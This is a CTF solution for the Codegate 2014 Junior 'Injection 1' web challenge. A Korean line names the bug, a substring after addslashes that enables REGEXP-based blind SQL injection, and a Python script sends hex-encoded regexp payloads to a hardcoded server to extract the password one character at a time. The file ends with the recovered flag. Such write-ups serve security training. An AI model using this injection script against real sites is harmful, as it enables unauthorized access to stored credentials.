[Codegate 2014 Junior CTF] Injection 1 . 300 Point. WEB

addslash 이후 substring 시 나타날 수 있는 취약점 + REGEXP를 활용한 blind sql injection.

#!/usr/bin/python
# http://58.229.183.25/eaf1c3a149e8c0dc599159c174655c2b/index.php?id=012345678901234567890123456789012345678\&pw=or(id+REGEXP+0x5E41)--+


import httplib, urllib
import time

def print_hex1(instr):
    convstr = "0x";
    for ch in instr:
        convstr += (hex(ord(ch))[2:4])
    return convstr

def print_dec1(instr):
    convstr = "char(";
    for i,ch in enumerate(instr):
        convstr += "%d" % ord(ch);
        if (len(instr)-1 != i) :
            convstr += ", ";
    convstr += ')';
    return convstr

headers = {"Content-type": "application/x-www-form-urlencoded",
           "Accept": "text/plain" }
		   
found = "^00c58a5ba17dafc6a67c88a88cff4f98"
for idx in range(1,44) :
	#for i in "abcdef1234567890" :
	for i in '''qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJMIKOLP0123456789~!@#$%^&*()_+}{|":<>?/.,;'[]\=-`''' :
		#blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1("^"+found+i))
		blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1(found[-4:]+i))
		params = ""
		#print found
		#print found[-4:]
		#time.sleep(1)
		#params = urllib.urlencode({"pw":"", "id":"", "no":blind})
		conn = httplib.HTTPConnection("58.229.183.25")
		#conn.set_debuglevel(10)
		print blind
		rq = "/eaf1c3a149e8c0dc599159c174655c2b/index.php?%s" % blind
		#print rq
		b = time.time()
		conn.request("GET", rq, params, headers)

		response = conn.getresponse()

		print response.status, response.reason
		#print rq
		data = response.read()
		#print data
		if data.find("Wrong") > 0 :
			found += i
			print found
			conn.close()	
			break
		conn.close()
	print idx, found
	time.sleep(1)
	

print found


# 5e7a6f6d626965242424 = ^zombie$$$
# 5e303063353861356261 = ^00c58a5ba

# password is ChA1N3D_EXPLOIT_IS_EVERYWHERE